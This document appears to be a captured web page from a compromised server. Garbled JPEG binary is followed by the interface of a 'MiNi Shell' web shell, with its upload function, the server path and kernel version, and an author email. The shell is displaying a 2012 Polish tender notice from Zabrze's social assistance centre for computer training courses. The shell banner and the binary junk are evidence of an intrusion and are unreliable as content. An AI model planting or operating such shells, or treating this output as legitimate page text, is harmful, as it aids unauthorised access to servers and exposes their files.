JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120417/86739-N-2012.html

<p class="kh_header"><b>Zabrze: Szkolenia komputerowe dla uczestników uczestniczek projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze</b><br>
<b>Numer ogłoszenia: 86739 - 2012; data zamieszczenia: 17.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia komputerowe dla uczestników uczestniczek projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> organizacja i przeprowadzenie szkoleń komputerowych  realizowanych przez Miejski Ośrodek Pomocy Rodzinie dla uczestników/uczestniczek projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt.Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze
W ramach zamówienia Wykonawca zobowiązany będzie do przeprowadzenia nw szkoleń kursów
1.	 Obsługa komputera i Internetu w stopniu podstawowym.  W szkoleniu weźmie udział od 10 do 25 uczestników uczestniczek projektu systemowego.
Program powinien zawierać m.in. podstawy obsługi komputera - budowa i użytkowanie, praca w systemie operacyjnym MS Windows, przetwarzanie tekstów - MS Word, praca z arkuszem kalkulacyjnym - MS Excel, praca w Power Point, obsługa Internetu, usługi w sieci.
2.	Obsługa komputera w stopniu zaawansowanym. W szkoleniu weźmie udział od 10 do 20 uczestników uczestniczek projektu systemowego.
Program powinien zawierać m.in. zaawansowanego przetwarzania tekstów  MS Word, zaawansowane możliwości arkuszy kalkulacyjnych - MS Excel, zaawansowane tworzenie prezentacji - MS PowerPoint.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia kursu dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby skierowanych osób na szkolenie kurs.
A)	FORMA , MIEJSCE i CZAS TRWANIA
1. Realizacja odbywać się będzie 5 dni w tygodniu od poniedziałku do piątku.
2. Godzina zegarowa zajęć szkolenia kursu liczy  45 minut zajęć i 15 minut przerwy.
3. Ilość godzin na każdego uczestnika( 50 dla szkolenia kursu obsługi komputera w stopniu podstawowym i 40 dla szkolenia kursu obsługi komputera w stopniu zaawansowanym).
4. Miejsce realizacji szkolenia kursu - pomieszczenia  i ośrodki  na terenie miasta Zabrze  .
B) SALA E SZKOLENIOWA E SPRZĘT 
1. Wykonawca zobowiązany jest do zapewnienia podczas zajęć praktycznych wyposażenia dydaktycznego, odpowiadającego obowiązującemu stanowi prawnemu i poziomowi techniki oraz do udostępnienia uczestnikom uczestniczkom wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia szkolenia. Pomieszczenia będą  dostosowane do prowadzenia zajęć i odpowiednio w tym celu wyposażone. Wykonawca zapewni stanowiska komputerowe w ilości 1 komputer dla 1 uczestnika uczestniczki. Wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż i być w pełni sprawny technicznie. Zapewnione pomieszczenie sala wyposażona będzie w odpowiednią do liczby uczestników uczestniczek  liczbę stolików i miejsc siedzących, właściwie oświetloną, ogrzewaną, przewietrzaną i odizolowaną od innych pomieszczeń.  
2. Organizator kursu szkolenia zapewnia materiały szkoleniowe w formie skryptu  dla każdego uczestnika uczestniczki , w tym jeden dodatkowy do dokumentacji projektu) 
C) CATERING
1. Organizator szkolenia kursu zapewnienia w kosztach zajęć usługę cateringu rozumianą jako przygotowanie i serwowanie posiłków, przez które Zamawiający rozumie jako podanie uczestnikom uczestniczkom  szkolenia kursu w trakcie jednego -każdego dnia szkolenia kursu  dobrej jakości  kawy, herbaty, kruchych ciastek (min 50 g na osobę) oraz zimnych napojów (wody i mineralnej i soków) w ilości 0,5l na osobę, a także ciepłego dwudaniowego obiadu na który składać się będzie np. : zupa(ok. 300ml na osobę)oraz mięso(kotlet,kurczak,filet)ok.250 - 300g, ziemniaki, frytki lub ryż oraz sałatka. Zamawiający nie dopuszcza możliwości serwowania jako obiadu gotowych dań typu fast food oraz gotowych sproszkowanych zup. Posiłek ma być podany w miejscu szkolenia kursu w hermetycznie zapakowanych pojemnikach oraz termosach do ciepłych posiłków wraz ze sztućcami jednorazowymi lub ma być serwowany w lokalu gastronomicznym w odległości umożliwiającej piesze dojście uczestników uczestniczek w terminie ok. 5 minut tj. w odległości do 300m od miejsca realizacji szkolenia kursu.
Dostęp do kawy, herbaty i drobnych przekąsek na zajęciach będzie możliwy stale tj. w miejscu realizacji zajęć .
D) OPŁATY DODATKOWE
1.  Wykonawca zapewni dojazd i powrót uczestników uczestniczek na szkolenie kurs (bilety na komunikację miejską)
2. Opłata za egzamin wewnętrzny
E) POSTANOWIENIA DODATKOWE:
E.1zapewnienie ubezpieczenia NNW, każdego uczestnika uczestniczki szkolenia kursu podczas zajęć na kwotę 10000,00 zł 1 osobę;
E.2 zapewnienie oznakowania pomieszczeń w których będą odbywały się zajęcia oraz wszelkich dokumentów związanych z realizacją szkolenia kursu oraz na materiałach przekazywanych uczestnikom uczestniczkom w trakcie zajęć;
E.3.przedstawienie szczegółowego programu  szkolenia kursu-harmonogramu,  który musi zawierać zagadnienia wymagane programem zajęć. Powinny się tam znaleźć dodatkowo: miejsce realizacji (dokładny adres),  czas trwania i sposób organizacji cateringu.
E.4 zapewnienie po zakończeniu szkolenia kursu zaświadczenia o ukończeniu wraz z informacją o współfinansowaniu projektu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze poprzez wydanie go uczestnikom uczestniczkom 
E.5 zamawiający nie jest w stanie dokładnie sprecyzować ilości uczestników uczestniczek szkolenia kursu mogących wziąć w nim udział. Wykonawca winien dokonać kalkulacji zgodnie z podanymi ramami ilościowymi uczestników uczestniczek.
F) KADRA
1. Zajęcia w ramach szkolenia kursu zrealizują wykładowcy i instruktorzy Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe w liczbie umożliwiającej ukończenie szkolenia kursu w terminie wskazanym przez Zamawiającego.
G) ZAPŁATA FAKTURY
Zamawiający zapłaci za zgłoszonych pisemnie uczestników uczestniczki szkolenia, którzy ukończyli pełen szkolenie kurs.
Jednakże Zamawiający dopuszcza zrealizowanie płatności za uczestnika uczestniczkę proporcjonalnie.  Faktura zrealizowana będzie po realizacji całego szkolenia kursu . 
H) PROMOCJA OZNAKOWANIE DOKUMENTACJA
Wykonawcy zobowiązani są do: 
H.1. promowania Unii Europejskiej, Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Kapitał Ludzki między innymi poprzez umieszczenie w miejscu odbywania szkolenia kursu, na dokumentacji dotyczącej przebiegu realizacji szkolenia, na materiałach szkoleniowych oraz przedmiotach niezbędnych do realizacji przedmiotu umowy w sprawie zamówienia informacji Szkolenie kurs realizowany a  na potrzeby  projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze  oraz oznaczenia logo EFS, Unii Europejskiej i logo PO KL zgodnie z zasadą wizualizacji dostępną na stronie www.efs.silesia-region.pl w zakładce promocja;
H.2. wykonawca w ramach szkolenia kursu zobowiązuje się do prowadzenia pełnej dokumentacji z przebiegu szkolenia kursu , obejmującej dla każdego szkolenia kursu:
a.	program szkolenia kursu;
b.	prowadzenie kart przeprowadzonych zajęć (zawierających listę obecności, wymiar godzin i tematy zajęć edukacyjnych);
c.	potwierdzenie otrzymania cateringu (z podziałem na dni) 
d.	rejestr wydanych zaświadczeń potwierdzających ukończenie szkolenia kursu
e.	imienną listę osób które ukończyły szkolenie kurs wraz z dołączoną opinią dla każdego uczestnika uczestniczki odnośnie nabytych umiejętności i kwalifikacji zawodowych.
f.	protokół egzaminu wewnętrznego
Powyższe dokumenty oryginały kopie Wykonawca przekaże Zamawiającemu w celu potwierdzenia przeprowadzenia szkolenia kursu. Ponadto Wykonawca dokona archiwizacji ww dokumentów na okres do 31.12.2020r., zapewniając dostęp do przechowywanej dokumentacji w ramach kontroli wykonania przedmiotu zamówienia. Wszystkie dokumenty sporządzane przez Wykonawcę będą opatrzone logotypami projektu systemowego;
H.3.umieszczać logo POKL, logo EFS, emblemat Unii Europejskiej oraz informację o tym, iż szkolenie kurs odbywa się w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego związanych z realizacją przedmiotu zamówienia.
H.4. W miejscu organizacji szkolenia kursu oraz na materiałach dydaktycznych umieszczać logo POKL, logo EFS, emblematu Unii Europejskiej oraz informacji o tym, iż szkolenie kurs odbywa się w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego (obowiązujące logotypy dostępne są na stronie http:efs.silesia-region.pl).
H.5. Ww informacje muszą zawierać :
a.	znak Kapitał Ludzki Narodowa Strategia Spójności 
b.	flagę Unii Europejskiej Europejski Fundusz Społeczny
c.	z tyłu pełną nazwę projektu i informację o współfinansowaniu:
Reintegracja, Aktywność, Praca. Program na  rzecz integracji
społeczno-zawodowej w gminie Zabrze.
Projekt współfinansowany przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego
H.6.Wydać uczestnikowi uczestniczce oryginał zaświadczenia poświadczenie o ukończeniu szkolenia kursu zawierającego informację o realizowaniu szkolenia kursu w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, kopię ww zaświadczenia Wykonawca zobowiązuje się wydać Zamawiającemu. Jeżeli nie ma możliwości zamieszczenia odpowiedniej informacji na zaświadczeniu -  wydać dodatkowe zaświadczenie zawierające wskazaną informację.
H.7. Przekazać Zamawiającemu po zakończeniu szkolenia kursu  wszelkie dokumenty oryginały kopie w celu potwierdzenia realizacji przedmiotu umowy;
I)  TERMIN WYKONANIA ZAMÓWIENIA
Zamawiający zamierza zrealizować szkolenie do 31.10.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o braku podstaw oraz wpis do rejestru instytucji szkoleniowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o braku podstaw oraz oświadczenie , że wykonali lub wykonują należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie minimum 2 zamówienia usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie oraz zaświadczenie z US</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje lub inny dokument potwierdzający , że usługa została wykonana należycie</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowany wzór umowy pełnomocnictwo formularz oferty aktualny wpis do rejestru instytucji szkoleniowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy;
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych;
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana limitów osób - uczestników uczestniczek ,
- zmiana miejsca realizacji zajęć ;
-zmiana terminu realizacji zamówienia;
- wprowadzenie informacji dodatkowych związanych z nowymi wytycznymi w realizacji Projektu;
- zmiana wymiaru realizacji ilości godzin;
- zmiana osób -kadry zapewnionej przez Wykonawcę;
- w przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku VAT, ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl www.mopr.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI OŚRODEK POMOCY RODZINIE UL.ROOSEVELTA 40 41-800 ZABRZE POKÓJ 216-2 PIĘTRO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 09:00, miejsce: MIEJSKI OŚRODEK POMOCY RODZINIE UL.ROOSEVELTA 40 41-800 ZABRZE POKÓJ 117 KANCELARIA-1 PIĘTRO.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com